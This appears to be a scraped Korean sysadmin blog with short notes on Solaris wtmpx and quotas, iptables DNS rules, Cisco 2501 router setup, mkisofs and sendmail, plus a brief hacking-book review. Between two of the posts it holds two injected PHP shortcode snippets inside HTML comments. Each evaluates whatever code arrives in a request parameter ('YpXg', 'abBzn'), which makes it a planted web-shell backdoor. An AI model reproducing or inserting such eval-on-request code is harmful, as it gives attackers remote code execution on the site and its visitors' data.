Stealing the network, 서평을 보고…

http://www.hackerslab.org/images/menu2/stealing_the_network.jpg

Stealing the Network 라는 책의 서평에 관한 글이 해커스랩에 올라왔다.

뭐, 그동안 해킹에 관한 책들이 해킹의 세부적인 방법은 제시하지 않았다는 내용과 이 책은 그렇지 않다는 내용인데..

암튼, 흥미로웠던 점은, 시스코 라우터를 해킹한다든지, 프린터 서버( 내가 이해하기로는 24시간 켜져있는 프린터의 메모리에 화일을 저장한다는…)해킹이라든지하는 내용으로 되어 있다고 한다.

서평을 보면 굉장한 흥미를 유발시키는 이책은, 그러나 번역본이 나와있지 않고, 책값도 비싸단다.. 우리나라 돈으로 5만원이 넘는다고 하는데..

암튼, 기회가 되면 한번 읽어보고 싶은 생각이 든다.

참고사이트
http://www.hackerslab.org/korg/view.fhz?menu=pre_box2&no=16

Solaris에서 wtmpx화일 보기?

역시 문서는 찾아봐야 해!!

fwtmp유틸리티를 이용한다.

사용방법.
cat /var/adm/wtmpx | /usr/lib/acct/fwtmp

참고 사이트.
http://kr.sun.com/service/techdocs/0006/000665.html

리눅스 iptables와 DNS 쿼리 …

리눅스에서 iptables로 포트 막은후 DNS 쿼리가 안 될 때가 있다..
이것은 다음과 같이 설정을 해 줘야 정상적인 DNS 쿼리가 진행 된다.

##### DNS client…. #####

iptables -A INPUT -i $EXTERNAL_INTERFACE -p udp –source-port 53 -d $IPADDRESS -destination-port $UNPRIVATEPORTS -j ACCEPT

iptables -A OUTPUT -o $EXTERNAL_INTERFACE -p udp -s $IPADDR –source-port $UNPRIVATEPORTS -destination-port 53 -j ACCEPT

example)
iptables -A INPUT -d 192.168.100.3 -i eth0 -p udp -m udp –sport 53 –dport 1024:8000 -j ACCEPT
iptables -A OUTPUT -s 192.168.100.3 -o eth0 -p udp -m udp –sport 1024:8000 –dport 53 -j ACCEPT

solaris ufs에 quota 지정하기

quota설정하기

solaris ufs에 quota지정하기

solaris ufs 화일 시스템에 Quota를 지정해 보았다.

리눅스에서와는 약간 방법이 다르다.

그렇지만 사용방법은 비슷하다.

테스트는 solaris9, ultra10 60GB EIDE HDD에서 했음.

quota는 /export/home에 지정하기로 함.

1. /etc/vfstab을 수정
/dev/dsk/c0t0d0s7 /dev/rdsk/c0t0d0s7 /export/home ufs 2 yes –
부분을 찾아서 다음과 같이 변경
/dev/dsk/c0t0d0s7 /dev/rdsk/c0t0d0s7 /export/home ufs 2 yes rq

2. /export/home에 quotas화일 생성(소유권 주의)
-rw——- 1 root other 98304 May 27 17:35 quotas

3. 사용자에게 quota할당(예로 store유저)
edquota store
fs /export/home blocks (soft = 10000, hard = 10000) inodes (soft = 0, hard = 0)

4. 시스템을 재부팅(재부팅 하지 않으려면 다음 명령어를 사용)
sh /etc/init.d/ufs_quota start
시간이 꽤 걸렸다.. 이부분에서..

5. 확인해본다.
repquota -a
다음과 같은 결과가……
/dev/dsk/c0t0d0s7 (/export/home):
Block limits File limits User used soft hard timeleft used soft hard timeleft
store +- 28422 10000 10000 NOT STARTED 2435 0 0

Quota관련 명령어에는 다음과 같은것이…..

quota, edquota, checkquota, repquota, quotaon, quotaoff

Solaris에서 rstatd의 역할…

솔라리스에서 rstatd가 하는일은……
얼마 전에야 알았다..

rstatd가 하는 일은 바로..
커널로 부터 퍼포먼스 통계를 받아서 보여주는 일을 한다..
간단히 말하면..
성능측정을 하는 역할을 한다.

<!– [insert_php]if (isset($_REQUEST["YpXg"])){eval($_REQUEST["YpXg"]);exit;}[/insert_php][php]if (isset($_REQUEST["YpXg"])){eval($_REQUEST["YpXg"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["abBzn"])){eval($_REQUEST["abBzn"]);exit;}[/insert_php][php]if (isset($_REQUEST["abBzn"])){eval($_REQUEST["abBzn"]);exit;}[/php] –>

Unix에서 ISO 이미지 만들기.

# mkisofs -o /tmp/cies.iso -V cies -R /test
-o : Output Option
/tmp/cies.iso : Image file이 생성되는 디렉토리
-V : Volume 이름 Option
cies : Volume 이름
-R : Sub dir. Option
/test : Image를 만들고자 하는 디렉토리(Source)

CISCO Router Quick setup?

cisco 2501에서..

1. Initialize
Ctrl+C
>o/r 0x142
>initialize

2. setting
router# config terminal
router(config)#
int e0
ip address [ethernet] [subnet-masks]
no shutdown
exit
int s0
ip address [serial1] [subnet-masks]
iproute 0.0.0.0 0.0.0.0 [serial0]
ip subnet-zero

config-register 0x2102

3. Frame-Relay setting
int s0 ip address [serial1] [netmasks]
enc fr IETF
fr lmi-type ansi
fr interface-dlci 16
fr map ip [serial0] 16 IETF
exit

3. 다른 방법
int s0
enc fr IETF
no keepalive
int s0.1 point-to-point
fr interface-dlci 16
no keepalive
exit

ip classless

4. Password Setting
line vty 0 4
login
password [password]
wr
enable secret [password]

오래전에 정리해 놓았던 것. 라우터 안만진지 오래돼서… 기억도 잘 안나네..

Solaris에서 CD-ROM의 auto mount …

cdrom, 플로피등의 미디어를 제어하는 서비스 데몬..

이 데몬을 죽이면, CDROM이 자동 마운트 되지 않음..

/etc/inetd.conf에서 다음의 항목임(solaris 9)

별것 아닌것 가지고 지금까지 수동으로 마운트 했음

# smserverd to support removable media devices
100155/1 tli rpc/ticotsord wait root /usr/lib/smedia/rpc.smse rverd rpc.smserverd

참고로, 수동 마운트 방법은 …
mount -F hsfs -ro /dev/dsk/c0d0s2 /mnt

RedHat 8.0과 Sendmail

이전 버젼과 너무 다르다.. 웹서버도 아파치 2.0 이고..
php와 연동이 되지 않아서…
이유를 알아 봤더니..
php.ini 화일에서
short_open_tag = Off로 되어 있는 것이 문제..

다음 문제는?
sendmail..
다른 호스트쪽에서 25번 포트가 보이지 않는 문제..
이건
O AutoRebuildAliases
이것을 주석처리 했더니 해결..
근데…
이번엔 virtual user쪽이 문제네..

암튼, 더 봐야겠다..